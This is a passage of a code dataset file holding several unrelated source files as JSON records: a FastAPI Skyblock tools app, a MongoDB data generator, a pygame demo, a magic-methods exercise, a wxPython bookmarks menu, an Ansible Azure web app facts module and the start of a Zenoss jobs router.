such as what items are auctionable.\"\n}, {\n \"name\": \"simplified\",\n \"description\": \"Simplifying complex endpoints for dev use\"\n}, {\n \"name\": \"flippers\",\n \"description\": \"Provides data for flipping\"\n}]\n\nlogger = logging_setup.setup() # sets up config logging\n\napp = FastAPI(\n title=\"Skyblock Tools\",\n description=description,\n version=\"1.0.1\",\n 
openapi_tags=tags_metadata,\n license_info={\n \"name\": \"GNU General Public License v3.0\",\n \"url\": \"https://choosealicense.com/licenses/gpl-3.0/\",\n },\n)\n\nfavicon_path = './static/favicon.ico'\n\n\n@app.get(\"/\", include_in_schema=False)\nasync def home():\n return RedirectResponse(\"/docs\")\n\n\n@app.get(\"/favicon.ico\", include_in_schema=False)\nasync def favicon():\n return FileResponse(favicon_path)\n\n\n@app.get(\"/api\", include_in_schema=False)\nasync def api():\n return main.get_json(\"https://api.hypixel.net/resources/skyblock/items\")\n\n\n@app.get(\"/auction_api?page={page}\", include_in_schema=False)\nasync def auction_api():\n return main.get_json(\n \"https://api.hypixel.net/skyblock/auctions?page={page}\")\n\n\n@app.get(\"/items/items/\", tags=[\"items\"], response_model=models.Items)\nasync def items() -> models.Items:\n return db\n\n\n@app.get(\"/items/item/{item}/\", tags=[\"items\"], response_model=models.Item)\nasync def item(item: str) -> models.Item:\n return db[item]\n\n\n@app.get(\"/items/item/{item}/name/\",\n tags=[\"items\"],\n response_model=models.Name)\nasync def name(item: str) -> models.Name:\n return models.Name(id=item, name=db[item][\"name\"])\n\n\n@app.get(\"/items/item/{item}/image/\", tags=[\"items\"])\nasync def image(item: str):\n \"\"\"\n Get an item's image.\n\n :param item: The item's id.\n :return: The item's image.\n \"\"\"\n try:\n image, _ = urllib.request.urlretrieve(db[item][\"image_link\"],\n \"./static/assets/image.png\")\n except urllib.error.HTTPError:\n image, _ = urllib.request.urlretrieve(db[item][\"alt_image_link\"],\n \"./static/assets/image.png\")\n logger.warning(f\"Failed to download image for item {item}\")\n return FileResponse(image)\n\n\n@app.get(\"/items/item/{item}/recipe/\",\n tags=[\"items\"],\n response_model=models.Recipe)\nasync def recipe(item: str) -> models.Recipe:\n if db[item][\"craftable\"] or db[item][\"forgable\"]:\n return models.Recipe(recipe=db[item][\"recipe\"],\n ingredients=db[item][\"ingredients\"])\n else:\n logger.warning(f\"Item {item} is not craftable or forgable\")\n return {\"craftable\": False, \"forgable\": False}\n\n\n@app.get(\"/items/item/{item}/lowest_bin/\",\n tags=[\"items\"],\n response_model=models.Bins)\nasync def lowest_bin(item: str) -> models.Bins:\n if db[item].get(\"auctionable\") == True:\n return models.Bins(lowest=db[item][\"lowest_bin\"],\n second_lowest=db[item][\"second_lowest_bin\"])\n else:\n logger.warning(f\"Item {item} is not auctionable\")\n return {\"auctionable\": False}\n\n\n@app.get(\"/items/item/{item}/auctions/\",\n tags=[\"items\"],\n response_model=models.Auctions)\nasync def item_auctions(item: str):\n auctions = await main.get_auctions()\n auctions = [d for d in auctions if d[\"id\"] == item]\n return auctions\n\n\n@app.get(\"/items/item/{item}/bazaar/\",\n tags=[\"items\"],\n response_model=models.BazaarItem)\nasync def bazaar(item: str):\n if db[item].get(\"bazaarable\") == True:\n return models.BazaarItem(\n buy=db[item][\"bazaar_buy_price\"],\n sell=db[item][\"bazaar_sell_price\"],\n profit=db[item][\"bazaar_profit\"],\n percentage_profit=db[item][\"bazaar_percentage_profit\"])\n else:\n logger.warning(f\"Item {item} is not bazaarable\")\n return {\"bazaarable\": False}\n\n\n@app.get(\"/items/item/{item}/price/\",\n tags=[\"items\"],\n response_model=models.Price)\nasync def price(item: str):\n if db[item].get(\"bazaarable\") == True:\n return models.Price(\n buy=db[item][\"bazaar_buy_price\"],\n sell=db[item][\"bazaar_sell_price\"],\n 
profit=db[item][\"bazaar_profit\"],\n percentage_profit=db[item][\"bazaar_percentage_profit\"])\n\n elif db[item].get(\"auctionable\") == True:\n return models.Price(\n buy=db[item][\"lowest_bin\"],\n sell=db[item][\"second_lowest_bin\"],\n profit=db[item][\"bin_flip_profit\"],\n percentage_profit=db[item][\"bin_flip_percentage_profit\"])\n\n elif db[item].get(\"npc_salable\") == True:\n return models.Price(sell=db[item][\"npc_sell_price\"])\n\n else:\n logger.warning(f\"Item {item} is not sellable\")\n return {\"unsellable\": True}\n\n\n@app.get(\"/items/item/{item}/forge/\",\n tags=[\"items\"],\n response_model=models.ForgeItem)\nasync def forge(item: str):\n if db[item].get(\"forgable\") == True:\n return models.ForgeItem(\n cost=db[item][\"forge_cost\"],\n profit=db[item][\"forge_profit\"],\n duration=db[item][\"duration\"],\n pretty_duration=db[item][\"pretty_duration\"],\n profit_per_hour=db[item][\"forge_profit_per_hour\"],\n percentage_profit=db[item][\"forge_percentage_profit\"],\n recipe=db[item][\"recipe\"],\n ingredients=db[item][\"ingredients\"])\n else:\n logger.warning(f\"Item {item} is not forgable\")\n return {\"forgable\": False}\n\n\n@app.get(\"/constants/bazaarables/\", tags=[\"constants\"], response_model=list)\nasync def bazaarables():\n bazaarables = [item for item in db if db[item][\"bazaarable\"]]\n return bazaarables\n\n\n@app.get(\"/constants/auctionables/\", tags=[\"constants\"], response_model=list)\nasync def auctionables():\n auctionables = [item for item in db if db[item][\"auctionable\"]]\n return auctionables\n\n\n@app.get(\"/constants/craftables/\", tags=[\"constants\"], response_model=list)\nasync def craftables():\n craftables = [item for item in db if db[item][\"craftable\"]]\n return craftables\n\n\n@app.get(\"/constants/forgables/\", tags=[\"constants\"], response_model=list)\nasync def forgables():\n forgables = [item for item in db if db[item][\"forgable\"]]\n return forgables\n\n\n@app.get(\"/simplified/auctions/\",\n tags=[\"simplified\"],\n response_model=models.Auctions)\nasync def auctions(page: int = 0):\n auctions = await main.get_auctions()\n auctions = list(main.chunks(auctions, 5000))\n logger.info(f\"Got auctions page {page}\")\n return auctions[page]\n\n\n@app.get(\"/flippers/bazaar/\", tags=[\"flippers\"], response_model=list)\nasync def bazaar_flipper():\n return main.bazaar_flipper()\n\n\n@app.get(\"/flippers/bazaar/html/\", tags=[\"flippers\"], response_model=str)\nasync def bazaar_flipper_html():\n return main.build_table(main.bazaar_flipper()[0],\n main.bazaar_flipper()[1],\n \"./templates/bazaar_flipper_data.html\")\n\n\n@app.get(\"/flippers/craft/\", tags=[\"flippers\"], response_model=list)\nasync def craft_flipper():\n return main.craft_flipper()\n\n\n@app.get(\"/flippers/craft/html/\", tags=[\"flippers\"], response_model=str)\nasync def craft_flipper_html():\n return main.build_table(main.craft_flipper()[0],\n main.craft_flipper()[1],\n \"./templates/craft_flipper_data.html\")\n\n\n@app.get(\"/flippers/forge/\", tags=[\"flippers\"], response_model=list)\nasync def forge_flipper():\n return main.forge_flipper()\n\n\n@app.get(\"/flippers/forge/html/\", tags=[\"flippers\"], response_model=str)\nasync def forge_flipper_html():\n return main.build_table(main.forge_flipper()[0],\n main.forge_flipper()[1],\n \"./templates/forge_flipper_data.html\")\n\n\n@app.get(\"/flippers/bin/\", tags=[\"flippers\"], response_model=list)\nasync def bin_flipper():\n return main.bin_flipper()\n\n\n@app.get(\"/flippers/bin/html/\", 
tags=[\"flippers\"], response_model=str)\nasync def bin_flipper_html():\n return main.build_table(main.bin_flipper()[0],\n main.bin_flipper()[1],\n \"./templates/bin_flipper_data.html\")\n\n\n@repeat_every(seconds=60 * 2, wait_first=True, logger=logger)\nasync def dynamic_database_updater_task():\n global db\n logger.info(\"Dynamic database update\")\n db = await run_in_threadpool(\n lambda: main.dynamic_database_updater(db, main.names))\n\n\n@repeat_every(seconds=60 * 60, wait_first=True, logger=logger)\nasync def static_database_updater_task():\n global db\n logger.info(\"Static database update\")\n db = await run_in_threadpool(\n lambda: main.static_database_updater(main.names))\n\n\n@app.on_event(\"startup\")\nasync def load_db():\n global db\n async with aiofiles.open(\"./data/database.json\", \"r\") as database:\n database = await database.read()\n db = json.loads(database)\n\n\nuvloop.install()\n\nif __name__ == \"__main__\":\n uvicorn.run(\"app:app\", host='0.0.0.0', port=8080)\n","repo_name":"socalledtheraven/Skyblock-Tools","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"74714726915","text":"import datetime\nimport pymongo\nfrom random import randrange, randint\n\nclass Stock:\n def __init__(self, _id):\n self._id = _id\n self.magasin = \"MAG\" + str(randint(1,10))\n self.quantite = randint(0, 1000)\n self.active = bool(randint(0,1))\n self.idProduit = randint(0, 100000)\n self.creationDate = self.random_date().strftime('%Y-%m-%dT%H:%M:%S.000+0000')\n\n def random_date(self):\n start = datetime.datetime(randint(1980, datetime.datetime.now().year),\n randint(1, 12),\n 1, 0, 0, 0)\n res = start + datetime.timedelta(days=randrange(30),\n hours=randrange(24),\n minutes=randrange(60),\n seconds=randrange(60))\n return res\n\n def __str__(self):\n return \"stock : [\" + str(self.idStock) \\\n + \", \" + str(self.magasin) \\\n + \", \" + str(self.quantite) \\\n + \", \" + str(self.active) \\\n + \", \" + str(self.idProduit) \\\n + \", \" + str(self.creationDate) + \"]\"\n\nclient = pymongo.MongoClient(\"192.168.99.101\", 27017) ## driver connector to the mongodb container docker\ndatabase = client[\"apiStock\"] ## target database name\ncollection = database[\"stock\"] ## target collection\nfor i in range(1, 500001):\n try:\n line = Stock(i).__dict__\n collection.insert_one(line)\n print(line.__str__())\n except:\n collection.update(line)","repo_name":"AlexandreGuil/microservice-stock","sub_path":"microservices-api/spring-reactive-mongoapi-stock/target/classes/getDatasetStockJson.py","file_name":"getDatasetStockJson.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74282349633","text":"import sys,os\r\nimport pygame\r\n\r\npath = os.path.dirname(__file__)\r\nos.chdir(path)\r\n\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((500,403))\r\n\r\nimg = pygame.image.load('fhcq.jpg')\r\nsurface = pygame.Surface((500,403),pygame.SRCALPHA)\r\npygame.draw.circle(surface,(255,105,180,100),(500//2,403//2),403//2)\r\n\r\n\r\nwhile True:\r\n screen.blit(img,(0,0))\r\n screen.blit(surface,(0,0))\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n \r\n 
pygame.display.update()\r\n\r\n","repo_name":"JessicaFeng0926/pygame_examples","sub_path":"pg003transparent_circle/pg003transparent_circle.py","file_name":"pg003transparent_circle.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36087486769","text":"'''\nImplement a class and override the magic methods for the basic mathematical operations (addition, subtraction, multiplication, division), adding console output of the current operation.\n\nFor example: when multiplying, a message is printed saying that multiplication is happening.\n'''\nclass Test(int):\n    '''initialization'''\n    def __init__(self, num):\n        super().__init__()\n        self.num = num\n    \n    '''addition'''\n    def __add__(self, num2):\n        print('Addition in progress')\n        return self.num + num2\n    '''Subtraction'''\n    def __sub__(self, num3):\n        print('Subtraction in progress')\n        return self.num - num3\n    '''Multiplication'''\n    def __mul__(self,num4):\n        print('Multiplication in progress')\n        return self.num * num4\n    '''Division'''\n    def __truediv__(self,num5):\n        print('Division in progress')\n        return self.num / num5\n    \na = Test(10)\nb = Test(2)\nc = Test(3)\nd = Test(2)\nf = Test(5)\nprint(a + b)\nprint(a - c)\nprint(a * c)\nprint(a / d)\n\n\n","repo_name":"NikitaR041/Courses-in-Innopolis","sub_path":"ДЗ-модуль_1_2/(9)19.12.2022 - Основы ООП/Работа с ООП (2).py","file_name":"Работа с ООП (2).py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26908792450","text":"import os.path\nimport wx\nfrom sProperty import *\nimport sScrolledMessageDialog\n\nclass sBookmarksMenu(wx.Menu):\n    def __init__(self, parent):\n        wx.Menu.__init__(self)\n\n        self.ID_BOOKMARK_BASE = 5500\n\n        self.ID_BOOKMARK_MENU = 5199\n\n        self.bookmarks = []\n\n        self.parent = parent\n        self.datdirectory = parent.datdirectory\n\n        self.loadBookmarks()\n\n    def loadBookmarks(self):\n        bookfile = self.datdirectory + \"/bookmarks.dat\"\n        if os.path.exists(bookfile):\n            try:\n                #Read from the file\n                f = open(bookfile, 'r')\n                folders = [self]\n                folderindex = 0\n                menuTitles = []\n                menuTitleindex = -1\n                lastCount = 1\n                bookmarkcount = 0\n                #Skip the First Line\n                line = f.readline()\n                #Initialize\n                line = f.readline()\n                while line:\n                    c = line.count('\\t')\n                    line = line[c:].rstrip()\n                    while lastCount > c:\n                        folders[(folderindex - 1)].AppendMenu(self.ID_BOOKMARK_MENU, menuTitles.pop(), folders.pop())\n                        folderindex = folderindex - 1\n                        menuTitleindex = menuTitleindex - 1\n                        lastCount = lastCount - 1\n                    if line[0] == '>':\n                        folders.append(wx.Menu())\n                        menuTitles.append(line[1:])\n                        folderindex = folderindex + 1\n                        menuTitleindex = menuTitleindex + 1\n                        c = c + 1\n                    else:\n                        self.bookmarks.append(line)\n                        self.parent.Bind(wx.EVT_MENU, self.OnBookmark, id=(self.ID_BOOKMARK_BASE + bookmarkcount))\n                        folders[folderindex].Append((self.ID_BOOKMARK_BASE + bookmarkcount), line, line)\n                        bookmarkcount = bookmarkcount + 1\n                    lastCount = c\n                    line = f.readline()\n                f.close()\n                #Add any menus not yet added:\n                c = 1\n                while lastCount > c:\n                    folders[(folderindex - 1)].AppendMenu(self.ID_BOOKMARK_MENU, menuTitles.pop(), folders.pop())\n                    folderindex = folderindex - 1\n                    menuTitleindex = menuTitleindex - 1\n                    lastCount = lastCount - 1\n            except:\n                sScrolledMessageDialog.ShowMessage(self.parent, (\"Your bookmarks file is a tad messed up.\\n\"), \"Error\")\n\n    def OnBookmark(self, event):\n        bookmarkindex = event.GetId() - self.ID_BOOKMARK_BASE\n        if not 
(os.path.exists(self.bookmarks[bookmarkindex])):\n sScrolledMessageDialog.ShowMessage(self.parent, (\"Error with: \" + self.bookmarks[bookmarkindex] + \"\\nBookmark does not actually exist.\\n\"), \"Error\")\n return\n if os.path.isdir(self.bookmarks[bookmarkindex]):\n self.parent.ddirectory = self.bookmarks[bookmarkindex].replace(\"\\\\\", \"/\")\n self.parent.OnOpen(event)\n return\n old = self.parent.txtDocument.filename\n filename = self.bookmarks[bookmarkindex].replace(\"\\\\\", \"/\")\n\n alreadyopen = self.parent.GetAlreadyOpen()\n if filename in alreadyopen:\n self.parent.setDocumentTo(alreadyopen.index(filename))\n return\n\n if (len(old) > 0) or self.parent.txtDocument.GetModify():\n self.parent.OpenFile(filename, True)\n else:\n self.parent.OpenFile(filename, False)\n\n def reloadBookmarks(self):\n mnuitems = self.GetMenuItems()\n num = len(mnuitems)\n x = 0\n while x < num:\n self.Remove(mnuitems[x].GetId())\n #mnuitems[x].Destroy()\n x = x + 1\n self.bookmarks = []\n self.loadBookmarks()\n","repo_name":"Thoshh/seer-editor","sub_path":"sBookmarksMenu.py","file_name":"sBookmarksMenu.py","file_ext":"py","file_size_in_byte":3934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40502772067","text":"from modules import keyboard_module as kb\r\nfrom djitellopy import Tello\r\nimport numpy as np\r\nimport time,cv2,math\r\n\r\n\r\n\r\n######### Params\r\nfspeed = 120/10 # Forward speed cm/s\r\naSpeed = 360/6 # Angular Speed Degrees/s\r\ninterval = 0.25\r\ndInterval = fspeed*interval\r\naInterval = aSpeed*interval\r\nx,y=500,500\r\na = 0\r\nyaw = 0\r\npoints = [(0,0),(0,0)]\r\n###########################\r\n\r\nkb.init()\r\n\r\ntello = Tello()\r\ntello.connect()\r\nprint('Status | Battery=', tello.get_battery())\r\n\r\nglobal img\r\n\r\ndef getKeyboardInput():\r\n lr, fb, ud, yv = 0, 0, 0, 0\r\n speed = 15\r\n aspeed = 50\r\n global x,y,yaw,a \r\n d = 0\r\n\r\n if kb.getKey(\"LEFT\"): \r\n lr = -speed\r\n d = dInterval\r\n a = -180\r\n\r\n elif kb.getKey(\"RIGHT\"): \r\n lr = speed\r\n d = -dInterval\r\n a = 180\r\n\r\n if kb.getKey(\"UP\"): \r\n fb = speed\r\n d = dInterval\r\n a = 270\r\n\r\n elif kb.getKey(\"DOWN\"): \r\n fb = -speed\r\n d = -dInterval\r\n a = -90\r\n\r\n if kb.getKey(\"w\"): \r\n ud = speed\r\n elif kb.getKey(\"s\"): \r\n ud = -speed\r\n\r\n if kb.getKey(\"a\"): \r\n yv = -aspeed\r\n yaw -= aInterval\r\n\r\n elif kb.getKey(\"d\"): \r\n yv = aspeed\r\n yaw += aInterval\r\n\r\n if kb.getKey(\"h\"): \r\n tello.takeoff()\r\n time.sleep(2)\r\n\r\n if kb.getKey(\"q\"): \r\n tello.send_rc_control(0,0,0,0)\r\n tello.land()\r\n\r\n if kb.getKey(\"t\"):\r\n cv2.imwrite(f'resources/images/{time.time()}.jpg', img)\r\n time.sleep(0.3)\r\n\r\n time.sleep(0.25)\r\n a += yaw\r\n x += int(d*math.cos(math.radians(a)))\r\n y += int(d*math.sin(math.radians(a)))\r\n\r\n return [lr, fb, ud, yv, x, y]\r\n\r\ntello.streamon() # EDU no support when connected to wifi\r\n\r\ndef drawPoints(img, points):\r\n for point in points:\r\n cv2.circle(img,point,5,(0,0,255),cv2.FILLED)\r\n cv2.circle(img,points[-1],8,(0,255,0),cv2.FILLED)\r\n cv2.putText(img, f'({(points[-1][0]-500)/100},{(points[-1][1]-500)/100})m',\r\n (points[-1][0]+10,points[-1][1]+30),cv2.FONT_HERSHEY_PLAIN, 1, (255,0,255), 1) \r\n\r\n\r\nwhile True:\r\n vals = getKeyboardInput()\r\n tello.send_rc_control(vals[0],vals[1],vals[2],vals[3])\r\n \r\n # print('Status | TOF=', tello.get_distance_tof())\r\n # print('Status | Height=', tello.get_height())\r\n\r\n # img = 
tello.get_frame_read().frame\r\n    # img = cv2.resize(img, (360, 240))\r\n    # cv2.imshow(\"Image\", img)\r\n    # cv2.waitKey(1)\r\n\r\n    img = np.zeros((1000,1000, 3), np.uint8)\r\n    if(points[-1][0]!=vals[4] or points[-1][1]!=vals[5]):\r\n        points.append([vals[4],vals[5]])\r\n    drawPoints(img, points)\r\n    cv2.imshow(\"Output\", img)\r\n    cv2.waitKey(1)\r\n\r\n    time.sleep(0.03)","repo_name":"Harvard-MDE/TelloPet","sub_path":"projects/Mapping.py","file_name":"Mapping.py","file_ext":"py","file_size_in_byte":2677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29365612491","text":"from __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nANSIBLE_METADATA = {'metadata_version': '1.1',\n                    'status': ['preview'],\n                    'supported_by': 'community'}\n\n\nDOCUMENTATION = '''\n---\nmodule: azure_rm_webapp_facts\n\nversion_added: \"2.7\"\n\nshort_description: Get azure web app facts.\n\ndescription:\n    - Get facts for a specific web app, all web apps in a resource group, or all web apps in the current subscription.\n\noptions:\n    name:\n        description:\n            - Only show results for a specific web app.\n    resource_group:\n        description:\n            - Limit results by resource group.\n    return_publish_profile:\n        description:\n            - Indicate whether to return the publishing profile of the web app.\n        default: False\n        type: bool\n    tags:\n        description:\n            - Limit results by providing a list of tags. Format tags as 'key' or 'key:value'.\n\nextends_documentation_fragment:\n    - azure\n\nauthor:\n    - \"Yunge Zhu (@yungezz)\"\n'''\n\nEXAMPLES = '''\n    - name: Get facts for web app by name\n      azure_rm_webapp_facts:\n        resource_group: testrg\n        name: winwebapp1\n\n    - name: Get facts for web apps in resource group\n      azure_rm_webapp_facts:\n        resource_group: testrg\n\n    - name: Get facts for web apps with tags\n      azure_rm_webapp_facts:\n        tags:\n          - testtag\n          - foo:bar\n'''\n\nRETURN = '''\nwebapps:\n    description: List of web apps.\n    returned: always\n    type: complex\n    contains:\n        id:\n            description:\n                - Id of the web app.\n            returned: always\n            type: str\n            sample: /subscriptions/xxxx/resourceGroups/xxx/providers/Microsoft.Web/sites/xx\n        name:\n            description:\n                - Name of the web app.\n            returned: always\n            type: str\n        resource_group:\n            description:\n                - Resource group of the web app.\n            returned: always\n            type: str\n        location:\n            description:\n                - Location of the web app.\n            returned: always\n            type: str\n        plan:\n            description:\n                - Id of app service plan used by the web app.\n            returned: always\n            type: str\n            sample: /subscriptions/xxxx/resourceGroups/xxx/providers/Microsoft.Web/serverfarms/xxx\n        app_settings:\n            description:\n                - App settings of the application. Only returned when web app has app settings.\n            type: complex\n        frameworks:\n            description:\n                - Frameworks of the application. Only returned when web app has frameworks.\n            type: complex\n        availability_state:\n            description: Availability of this web app.\n            type: str\n        default_host_name:\n            description: Host name of the web app.\n            type: str\n        enabled:\n            description: Indicates whether the web app is enabled.\n            type: bool\n        enabled_host_names:\n            description: Enabled host names of the web app.\n            type: list\n        host_name_ssl_states:\n            description: SSL state per host names of the web app.\n            type: list\n        host_names:\n            description: Host names of the web app.\n            type: list\n        outbound_ip_addresses:\n            description: Outbound ip address of the web app.\n            type: str\n        state:\n            description: State of the web app, e.g. 
running.\n type: str\n publishing_username:\n description: Publishing profle user name.\n returned: only when I(return_publish_profile) is True.\n type: str\n publishing_password:\n description: Publishing profile password.\n returned: only when I(return_publish_profile) is True.\n type: str\n'''\ntry:\n from msrestazure.azure_exceptions import CloudError\n from msrestazure.azure_operation import AzureOperationPoller\n from azure.common import AzureMissingResourceHttpError, AzureHttpError\nexcept:\n # This is handled in azure_rm_common\n pass\n\nfrom ansible.module_utils.azure_rm_common import AzureRMModuleBase\n\nAZURE_OBJECT_CLASS = 'WebApp'\n\n\nclass AzureRMWebAppFacts(AzureRMModuleBase):\n\n def __init__(self):\n\n self.module_arg_spec = dict(\n name=dict(type='str'),\n resource_group=dict(type='str'),\n tags=dict(type='list'),\n return_publish_profile=dict(type=bool, default=False)\n )\n\n self.results = dict(\n changed=False,\n webapps=[]\n )\n\n self.name = None\n self.resource_group = None\n self.tags = None\n self.return_publish_profile = False\n\n self.framework_names = ['net_framework', 'java', 'php', 'node', 'python', 'dotnetcore', 'ruby']\n\n super(AzureRMWebAppFacts, self).__init__(self.module_arg_spec,\n supports_tags=False,\n facts_module=True)\n\n def exec_module(self, **kwargs):\n\n for key in self.module_arg_spec:\n setattr(self, key, kwargs[key])\n\n if self.name:\n self.results['webapps'] = self.list_by_name()\n elif self.resource_group:\n self.results['webapps'] = self.list_by_resource_group()\n else:\n self.results['webapps'] = self.list_all()\n\n return self.results\n\n def list_by_name(self):\n self.log('Get web app {0}'.format(self.name))\n item = None\n result = []\n\n try:\n item = self.web_client.web_apps.get(self.resource_group, self.name)\n except CloudError:\n pass\n\n if item and self.has_tags(item.tags, self.tags):\n curated_result = self.get_curated_webapp(self.resource_group, self.name, item)\n result = [curated_result]\n\n return result\n\n def list_by_resource_group(self):\n self.log('List web apps in resource groups {0}'.format(self.resource_group))\n try:\n response = list(self.web_client.web_apps.list_by_resource_group(self.resource_group))\n except CloudError as exc:\n request_id = exc.request_id if exc.request_id else ''\n self.fail(\"Error listing web apps in resource groups {0}, request id: {1} - {2}\".format(self.resource_group, request_id, str(exc)))\n\n results = []\n for item in response:\n if self.has_tags(item.tags, self.tags):\n curated_output = self.get_curated_webapp(self.resource_group, item.name, item)\n results.append(curated_output)\n return results\n\n def list_all(self):\n self.log('List web apps in current subscription')\n try:\n response = list(self.web_client.web_apps.list())\n except CloudError as exc:\n request_id = exc.request_id if exc.request_id else ''\n self.fail(\"Error listing web apps, request id {0} - {1}\".format(request_id, str(exc)))\n\n results = []\n for item in response:\n if self.has_tags(item.tags, self.tags):\n curated_output = self.get_curated_webapp(item.resource_group, item.name, item)\n results.append(curated_output)\n return results\n\n def list_webapp_configuration(self, resource_group, name):\n self.log('Get web app {0} configuration'.format(name))\n\n response = []\n\n try:\n response = self.web_client.web_apps.get_configuration(resource_group_name=resource_group, name=name)\n except CloudError as ex:\n request_id = ex.request_id if ex.request_id else ''\n self.fail('Error getting web app {0} 
configuration, request id {1} - {2}'.format(name, request_id, str(ex)))\n\n return response.as_dict()\n\n def list_webapp_appsettings(self, resource_group, name):\n self.log('Get web app {0} app settings'.format(name))\n\n response = []\n\n try:\n response = self.web_client.web_apps.list_application_settings(resource_group_name=resource_group, name=name)\n except CloudError as ex:\n request_id = ex.request_id if ex.request_id else ''\n self.fail('Error getting web app {0} app settings, request id {1} - {2}'.format(name, request_id, str(ex)))\n\n return response.as_dict()\n\n def get_publish_credentials(self, resource_group, name):\n self.log('Get web app {0} publish credentials'.format(name))\n try:\n poller = self.web_client.web_apps.list_publishing_credentials(resource_group, name)\n if isinstance(poller, AzureOperationPoller):\n response = self.get_poller_result(poller)\n except CloudError as ex:\n request_id = ex.request_id if ex.request_id else ''\n self.fail('Error getting web app {0} publishing credentials - {1}'.format(request_id, str(ex)))\n return response\n\n def get_curated_webapp(self, resource_group, name, webapp):\n pip = self.serialize_obj(webapp, AZURE_OBJECT_CLASS)\n\n try:\n site_config = self.list_webapp_configuration(resource_group, name)\n app_settings = self.list_webapp_appsettings(resource_group, name)\n publish_cred = self.get_publish_credentials(resource_group, name)\n except CloudError as ex:\n pass\n return self.construct_curated_webapp(webapp=pip,\n configuration=site_config,\n app_settings=app_settings,\n deployment_slot=None,\n publish_credentials=publish_cred)\n\n def construct_curated_webapp(self, webapp, configuration=None, app_settings=None, deployment_slot=None, publish_credentials=None):\n curated_output = dict()\n curated_output['id'] = webapp['id']\n curated_output['name'] = webapp['name']\n curated_output['resource_group'] = webapp['properties']['resourceGroup']\n curated_output['location'] = webapp['location']\n curated_output['plan'] = webapp['properties']['serverFarmId']\n curated_output['tags'] = webapp.get('tags', None)\n\n # important properties from output. 
not match input arguments.\n curated_output['app_state'] = webapp['properties']['state']\n curated_output['availability_state'] = webapp['properties']['availabilityState']\n curated_output['default_host_name'] = webapp['properties']['defaultHostName']\n curated_output['host_names'] = webapp['properties']['hostNames']\n curated_output['enabled'] = webapp['properties']['enabled']\n curated_output['enabled_host_names'] = webapp['properties']['enabledHostNames']\n curated_output['host_name_ssl_states'] = webapp['properties']['hostNameSslStates']\n curated_output['outbound_ip_addresses'] = webapp['properties']['outboundIpAddresses']\n\n # curated site_config\n if configuration:\n curated_output['frameworks'] = []\n for fx_name in self.framework_names:\n fx_version = configuration.get(fx_name + '_version', None)\n if fx_version:\n fx = {\n 'name': fx_name,\n 'version': fx_version\n }\n # java container setting\n if fx_name == 'java':\n if configuration['java_container'] and configuration['java_container_version']:\n settings = {\n 'java_container': configuration['java_container'].lower(),\n 'java_container_version': configuration['java_container_version']\n }\n fx['settings'] = settings\n\n curated_output['frameworks'].append(fx)\n\n # linux_fx_version\n if configuration.get('linux_fx_version', None):\n tmp = configuration.get('linux_fx_version').split(\"|\")\n if len(tmp) == 2:\n curated_output['frameworks'].append({'name': tmp[0].lower(), 'version': tmp[1]})\n\n # curated app_settings\n if app_settings and app_settings.get('properties', None):\n curated_output['app_settings'] = dict()\n for item in app_settings['properties']:\n curated_output['app_settings'][item] = app_settings['properties'][item]\n\n # curated deploymenet_slot\n if deployment_slot:\n curated_output['deployment_slot'] = deployment_slot\n\n # curated publish credentials\n if publish_credentials and self.return_publish_profile:\n curated_output['publishing_username'] = publish_credentials.publishing_user_name\n curated_output['publishing_password'] = publish_credentials.publishing_password\n return curated_output\n\n\ndef main():\n AzureRMWebAppFacts()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"amitvashist7/ansible-development-CTS","sub_path":"molecule/my_env/lib/python2.7/site-packages/ansible/modules/cloud/azure/azure_rm_webapp_facts.py","file_name":"azure_rm_webapp_facts.py","file_ext":"py","file_size_in_byte":13143,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"17624214533","text":"import cgi\nimport logging\nfrom collections import defaultdict\nfrom Products import Zuul\nfrom Products.ZenMessaging.audit import audit\nfrom Products.ZenUtils.Ext import DirectRouter, DirectResponse\nfrom Products.Jobber.exceptions import NoSuchJobException\nfrom zope.event import notify\nfrom ZODB.transact import transact\nfrom Products.ZenUtils.events import QuickstartWizardFinishedEvent\n\nlog = logging.getLogger(\"zen.JobsRouter\")\n\n\nJOBKEYS = [\n \"uuid\",\n \"type\",\n \"description\",\n \"scheduled\",\n \"started\",\n \"finished\",\n \"duration\",\n \"status\",\n \"user\",\n \"logfile\",\n]\n\n\nclass JobsRouter(DirectRouter):\n \"\"\"\n A JSON/Ext.Direct interface to operations on jobs\n \"\"\"\n\n def __init__(self, context, request):\n self.api = Zuul.getFacade(\"jobs\", context.dmd)\n self.context = context\n self.request = request\n super(DirectRouter, self).__init__(context, request)\n\n def getJobs(self, start, limit, page, sort, dir, uid=None):\n # 
